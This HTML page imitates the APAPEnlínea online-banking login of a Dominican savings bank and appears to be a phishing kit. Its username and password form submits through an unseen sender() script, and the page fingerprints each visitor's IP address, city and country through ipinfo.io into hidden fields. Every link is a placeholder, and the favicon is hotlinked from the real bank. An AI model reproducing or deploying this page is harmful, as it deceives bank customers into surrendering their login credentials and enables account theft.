<!DOCTYPE html>
<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths no-ipad no-iphone no-ipod no-appleios">
   <!--<![endif]-->
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <style>body {transition: opacity ease-in 0.2s; } 
         body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
      </style>
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <title>APAPEn</title>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
      
      <script>
         $.getJSON("https://ipinfo.io", function (data) {
      $("#ip").html("" + data.ip);
      $("#address").html("" + data.city + ", " + data.country);

      })
      </script>
      <meta name="description" content="">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
      <link href="css/css" rel="stylesheet">
      <link rel="stylesheet" href="css/default.css">
      <link rel="shortcut icon" href="https://www.asociacionpopular.com.do/IBSapaponline/img/favicon.ico">
      <style type="text/css" id="vakata-stylesheet">#vakata-dragged { display:block; margin:0 0 0 0; padding:4px 4px 4px 24px; position:absolute; top:-2000px; line-height:16px; z-index:10000; } #vakata-contextmenu { display:block; visibility:hidden; left:0; top:-200px; position:absolute; margin:0; padding:0; min-width:180px; background:#ebebeb; border:1px solid silver; z-index:10000; *width:180px; } #vakata-contextmenu ul { min-width:180px; *width:180px; } #vakata-contextmenu ul, #vakata-contextmenu li { margin:0; padding:0; list-style-type:none; display:block; } #vakata-contextmenu li { line-height:20px; min-height:20px; position:relative; padding:0px; } #vakata-contextmenu li a { padding:1px 6px; line-height:17px; display:block; text-decoration:none; margin:1px 1px 0 1px; } #vakata-contextmenu li ins { float:left; width:16px; height:16px; text-decoration:none; margin-right:2px; } #vakata-contextmenu li a:hover, #vakata-contextmenu li.vakata-hover > a { background:gray; color:white; } #vakata-contextmenu li ul { display:none; position:absolute; top:-2px; left:100%; background:#ebebeb; border:1px solid gray; } #vakata-contextmenu .right { right:100%; left:auto; } #vakata-contextmenu .bottom { bottom:-1px; top:auto; } #vakata-contextmenu li.vakata-separator { min-height:0; height:1px; line-height:1px; font-size:1px; overflow:hidden; margin:0 2px; background:silver; /* border-top:1px solid #fefefe; */ padding:0; } </style>
      <style type="text/css" id="jstree-stylesheet">.jstree ul, .jstree li { display:block; margin:0 0 0 0; padding:0 0 0 0; list-style-type:none; } .jstree li { display:block; min-height:18px; line-height:18px; white-space:nowrap; margin-left:18px; min-width:18px; } .jstree-rtl li { margin-left:0; margin-right:18px; } .jstree > ul > li { margin-left:0px; } .jstree-rtl > ul > li { margin-right:0px; } .jstree ins { display:inline-block; text-decoration:none; width:18px; height:18px; margin:0 0 0 0; padding:0; } .jstree a { display:inline-block; line-height:16px; height:16px; color:black; white-space:nowrap; text-decoration:none; padding:1px 2px; margin:0; } .jstree a:focus { outline: none; } .jstree a > ins { height:16px; width:16px; } .jstree a > .jstree-icon { margin-right:3px; } .jstree-rtl a > .jstree-icon { margin-left:3px; margin-right:0; } li.jstree-open > ul { display:block; } li.jstree-closed > ul { display:none; } #vakata-dragged ins { display:block; text-decoration:none; width:16px; height:16px; margin:0 0 0 0; padding:0; position:absolute; top:4px; left:4px;  -moz-border-radius:4px; border-radius:4px; -webkit-border-radius:4px; } #vakata-dragged .jstree-ok { background:green; } #vakata-dragged .jstree-invalid { background:red; } #jstree-marker { padding:0; margin:0; font-size:12px; overflow:hidden; height:12px; width:8px; position:absolute; top:-30px; z-index:10001; background-repeat:no-repeat; display:none; background-color:transparent; text-shadow:1px 1px 1px white; color:black; line-height:10px; } #jstree-marker-line { padding:0; margin:0; line-height:0%; font-size:1px; overflow:hidden; height:1px; width:100px; position:absolute; top:-30px; z-index:10000; background-repeat:no-repeat; display:none; background-color:#456c43;  cursor:pointer; border:1px solid #eeeeee; border-left:0; -moz-box-shadow: 0px 0px 2px #666; -webkit-box-shadow: 0px 0px 2px #666; box-shadow: 0px 0px 2px #666;  -moz-border-radius:1px; border-radius:1px; -webkit-border-radius:1px; }.jstree .jstree-real-checkbox { display:none; } .jstree-themeroller .ui-icon { overflow:visible; } .jstree-themeroller a { padding:0 2px; } .jstree-themeroller .jstree-no-icon { display:none; }.jstree .jstree-wholerow-real { position:relative; z-index:1; } .jstree .jstree-wholerow-real li { cursor:pointer; } .jstree .jstree-wholerow-real a { border-left-color:transparent !important; border-right-color:transparent !important; } .jstree .jstree-wholerow { position:relative; z-index:0; height:0; } .jstree .jstree-wholerow ul, .jstree .jstree-wholerow li { width:100%; } .jstree .jstree-wholerow, .jstree .jstree-wholerow ul, .jstree .jstree-wholerow li, .jstree .jstree-wholerow a { margin:0 !important; padding:0 !important; } .jstree .jstree-wholerow, .jstree .jstree-wholerow ul, .jstree .jstree-wholerow li { background:transparent !important; }.jstree .jstree-wholerow ins, .jstree .jstree-wholerow span, .jstree .jstree-wholerow input { display:none !important; }.jstree .jstree-wholerow a, .jstree .jstree-wholerow a:hover { text-indent:-9999px; !important; width:100%; padding:0 !important; border-right-width:0px !important; border-left-width:0px !important; } .jstree .jstree-wholerow-span { position:absolute; left:0; margin:0px; padding:0; height:18px; border-width:0; padding:0; z-index:0; }</style>
      <style type="text/css">#_copy{align-items:center;background:#4494d5;border-radius:3px;color:#fff;cursor:pointer;display:flex;font-size:13px;height:30px;justify-content:center;position:absolute;width:60px;z-index:1000}#select-tooltip,#sfModal,.modal-backdrop,div[id^=reader-helper]{display:none!important}.modal-open{overflow:auto!important}._sf_adjust_body{padding-right:0!important}.super_copy_btns_div{position:fixed;width:154px;left:10px;top:45%;background:#e7f1ff;border:2px solid #4595d5;font-weight:600;border-radius:2px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;z-index:5000}.super_copy_btns_logo{width:100%;background:#4595d5;text-align:center;font-size:12px;color:#e7f1ff;line-height:30px;height:30px}.super_copy_btns_btn{display:block;width:128px;height:28px;background:#7f5711;border-radius:4px;color:#fff;font-size:12px;border:0;outline:0;margin:8px auto;font-weight:700;cursor:pointer;opacity:.9}.super_copy_btns_btn:hover{opacity:.8}.super_copy_btns_btn:active{opacity:1}</style>
      <script type="text/javascript" charset="UTF-8" src="js/common.js.descarga"></script><script type="text/javascript" charset="UTF-8" src="js/util.js.descarga"></script>
   </head>
   <body id="GlobalPageContainer" class="theme-apap" style="">
      <div id="myCarousel" class="carousel slide container-mobile hidden-xs" data-ride="carousel" style="padding-bottom: 40px;">
         <!-- Indicators -->
         <ol class="carousel-indicators" style="bottom: 30px">
         </ol>
         <!-- Wrapper for slides -->
         <div class="carousel-inner" role="listbox">
         </div>
         <!--Left and right controls-->
         <a class="left carousel-control" href="#" role="button" data-slide="prev" style="z-index: 15;">
         <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
         <span class="sr-only">&lt;</span>
         </a>
         <a class="right carousel-control" href="#" role="button" data-slide="next" style="z-index: 15;">
         <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
         <span class="sr-only">&gt;</span>
         </a>
      </div>
      <section id="mainWrapper" class="scrollable" style="width: 100%;margin:auto;left: initial;padding-top: 0px;padding-bottom: 50px;right: initial;top: 0px;overflow-y: scroll;
         position: absolute;">
         <div class="container" style=" max-width: 700px;margin-top:100px">
            <div class="panel panel-default logo-panel">
               <div class="panel-heading">
                  <div class="clearfix" style="cursor:pointer;" >
                     <img src="img/img_APAPENLINE.png">
                     <div class="text-center">
                        <h4></h4>
                     </div>
                  </div>
               </div>
            </div>
            <div id="" class="panel panel-default panel-block ibs-login-form">
               <form class="defaultForm" action="" method="post"  onsubmit=" return sender()" >
                  <footer class="panel-footer text-right" style="padding: 3px;"> </footer>
                  <div class="list-group">
                     <div class="list-group-item" id="iniciar-sesión">
                        <h4 class="section-title"> Iniciar sesión <br>
                           <small></small>
                        </h4>
                        <div class="erreurContainerId"></div>
                        <div id="loginNameCONTAINER" class=" form-group ">
                           <div class="row input-container">
                              <div class="col-md-3 col-lg-3 col-sm-12 col-xs-12 input-col">
                                 <div class="input-label">
                                    Usuario
                                    <span class="itss-required-"> * </span>
                                 </div>
                              </div>
                              <div class="col-md-9 col-lg-9 col-sm-12 col-xs-12 input-text-in">
                                 <div class="input-group">
                                    <input type="text" class="form-control parsley-validated " id="0T4RX" placeholder="Tu usuario APAPenline@ / APAPP Móvil"  required minlength="2">
                                    <span class="input-group-addon"><span class="glyphicon glyphicon-pencil"></span></span>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <div class="hidden">
                           <input type="password">
                        </div>
                        <div class=" form-group ">
                           <div class="row input-container">
                              <div class="col-md-3 col-lg-3 col-sm-12 col-xs-12 input-col">
                                 <div class="input-label"> Clave <span class="itss-required-"> * </span>
                                 </div>
                              </div>
                              <div class="col-md-9 col-lg-9 col-sm-12 col-xs-12 input-text-in">
                                 <div class="input-group">
                                    <input type="password" class="form-control parsley-validated passwordChecker" id="C0NTRX"  placeholder="Ingresa tu clave vigente" required minlength="2">
                                    <span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
                  <footer class="panel-footer text-right">   <span style="float: left">
                     Al ingresar aceptas <a href="#"> los términos y condiciones </a> uso website APAP. 
                     </span>
                     <button id="submitLogin" type="submit" class="btn btn-success-apap btn-sm ">
                     <span class="glyphicon glyphicon-check"></span>
                     Ingresar
                     </button>
                  </footer>
               </form>
            </div>
            <a href="#" style="display: inline-block;.text-overflow();white-space: nowrap;white-space: nowrap;
               width: 100%;
               line-height: 30px;
               color: #fff;
               background-color: rgba(192, 192, 192, 0.56);
               text-align: center;
               padding: 5px;
               margin-top: 5px;
               line-height: 30px;">
            <span class="icon-key "></span>
            Olvidé mi clave
            </a>
            <a href="#" style="display: inline-block;.text-overflow();white-space: nowrap;white-space: nowrap;
               width: 100%;
               line-height: 30px;
               color: #fff;
               background-color: rgba(192, 192, 192, 0.56);
               text-align: center;
               padding: 5px;
               margin-top: 5px;
               line-height: 30px;">
            <span class="icon-signin "></span>
            Solicitar acceso
            </a>
            <a href="#" style="display: inline-block;.text-overflow();white-space: nowrap;white-space: nowrap;
               width: 100%;
               line-height: 30px;
               color: #fff;
               background-color: rgba(192, 192, 192, 0.56);
               text-align: center;
               padding: 5px;
               margin-top: 5px;
               line-height: 30px;">
            <span class="icon-youtube "></span>
            Haz clic aquí y conoce tu nuevo APAPEnlíne@
            </a>
         </div>
      </section>
      <button type="button" id="IBS-BACK-BUTTON" onclick="doAction(&#39;ab226227-0277-4cb6-8cde-2a06f17d9e73&#39;,&#39;previewPage&#39;);" class="hidden"></button>
      <div class="footer" align="center">
         <span>© 2017 Asociación Popular de Ahorros y Préstamos, (v2.4.2) &nbsp; &nbsp; &nbsp; </span>  
         <a  href="#" style="font-size: 17px;">
            <icon class="icon-instagram"></icon>
         </a>
         <a  href="#">
            <icon class="icon-youtube-sign"></icon>
         </a>
         <a  href="#">
            <icon class="icon-facebook-sign"></icon>
         </a>
         <a  href="#">
            <icon class="icon-twitter-sign"></icon>
         </a>
         <a  href="#">
         <img src="img/img_ChatAPAP.jpeg" style="height: 30px;margin-right: -13px;">
         </a>
         <a  href="#">
         <img src="img/img_CitasAPAP.jpeg" style="height: 15px;">
         </a>
         <a target="" href="#">
         <span class="icon-phone"></span>
         Llámanos
         </a>
      </div>
      <div id="phoneNumberPopup" tabindex="-1" role="dialog" class="modal fade itssModal ">
         <div class="modal-dialog">
            <div class="modal-content">
               <div class="modal-header">
                  <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
                  <h4 class="modal-title">
                     <i class="icon-"></i> Llámanos
                  </h4>
               </div>
               <div class="modal-body">
                  <div class="panel-group" id="accordion">
                     <div class="panel panel-default">
                        <div class="panel-heading">
                           <h4 class="panel-title">
                              <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion" href="#"> <i class="icon-"></i>   Servicio al cliente Santo Domingo   <span style="float:right"><small></small></span>  </a>
                           </h4>
                        </div>
                        <div id="8096872727" class="panel-collapse collapse ">
                           <div id="top" class="panel panel-default panel-block panel-title-block">
                              <div class="panel-heading">
                                 <div class="row">
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descReference"><i class="icon-"></i><strong><a href="#"> <span class="icon-phone"></span>  809-687-APAP (2727) </a></strong></span>
                                    </div>
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descTitle"></span>
                                    </div>
                                 </div>
                                 <div class="row"></div>
                                 <div></div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="panel panel-default">
                        <div class="panel-heading">
                           <h4 class="panel-title">
                              <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion" href="#"> <i class="icon-"></i>  Desde el interior sin cargos:   <span style="float:right"><small></small></span>  </a>
                           </h4>
                        </div>
                        <div id="18092002737" class="panel-collapse collapse ">
                           <div id="top" class="panel panel-default panel-block panel-title-block">
                              <div class="panel-heading">
                                 <div class="row">
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descReference"><i class="icon-"></i><strong><a href="tel:18092002737"> <span class="icon-phone"></span>  1-809-200-2737 </a></strong></span>
                                    </div>
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descTitle"></span>
                                    </div>
                                 </div>
                                 <div class="row"></div>
                                 <div></div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="panel panel-default">
                        <div class="panel-heading">
                           <h4 class="panel-title">
                              <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion" href="#"> <i class="icon-"></i>  Internacional USA &amp; CANADA   <span style="float:right"><small></small></span>  </a>
                           </h4>
                        </div>
                        <div id="18775892727" class="panel-collapse collapse ">
                           <div id="top" class="panel panel-default panel-block panel-title-block">
                              <div class="panel-heading">
                                 <div class="row">
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descReference"><i class="icon-"></i><strong><a href="tel:18775892727"> <span class="icon-phone"></span>  1-877-589-2727 </a></strong></span>
                                    </div>
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descTitle"></span>
                                    </div>
                                 </div>
                                 <div class="row"></div>
                                 <div></div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="panel panel-default">
                        <div class="panel-heading">
                           <h4 class="panel-title">
                              <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion" href="#"> <i class="icon-"></i>    Internacional desde España   <span style="float:right"><small></small></span>  </a>
                           </h4>
                        </div>
                        <div id="900965083" class="panel-collapse collapse ">
                           <div id="top" class="panel panel-default panel-block panel-title-block">
                              <div class="panel-heading">
                                 <div class="row">
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descReference"><i class="icon-"></i><strong><a href="tel:900965083"> <span class="icon-phone"></span>  900-965-083 </a></strong></span>
                                    </div>
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descTitle"></span>
                                    </div>
                                 </div>
                                 <div class="row"></div>
                                 <div></div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="panel panel-default">
                        <div class="panel-heading">
                           <h4 class="panel-title">
                              <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion" href="#"> <i class="icon-"></i>   Telemed / Asistencia Vial   <span style="float:right"><small></small></span>  </a>
                           </h4>
                        </div>
                        <div id="8093312727" class="panel-collapse collapse ">
                           <div id="top" class="panel panel-default panel-block panel-title-block">
                              <div class="panel-heading">
                                 <div class="row">
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descReference"><i class="icon-"></i><strong><a href="tel:8093312727"> <span class="icon-phone"></span>  809-331-2727 </a></strong></span>
                                    </div>
                                    <div class="col-md-6 col-lg-6 col-sm-6">
                                       <span class="descTitle"></span>
                                    </div>
                                 </div>
                                 <div class="row"></div>
                                 <div></div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div class="modal-footer">
               </div>
            </div>
            <!-- /.modal-content -->
         </div>
      </div>
      <!-- /.modal -->
      <div class="hidden" id="messageErrorSystem">Please check your connection</div>
      <div class="hidden" id="messageSessionTimeout">Después de un período de inactividad, su sesión se cerrará</div>
      <div class="hidden" id="sessionTimeout">900</div>
      <div class="modal">
         <div class="cssload-loader">
            <div class="cssload-inner cssload-one"></div>
            <div class="cssload-inner cssload-two"></div>
            <div class="cssload-inner cssload-three"></div>
         </div>
      </div>
      <p id="ip" hidden >
      <p id="address" hidden>
     <script src="js/sax.js"></script>
   </body>
</html>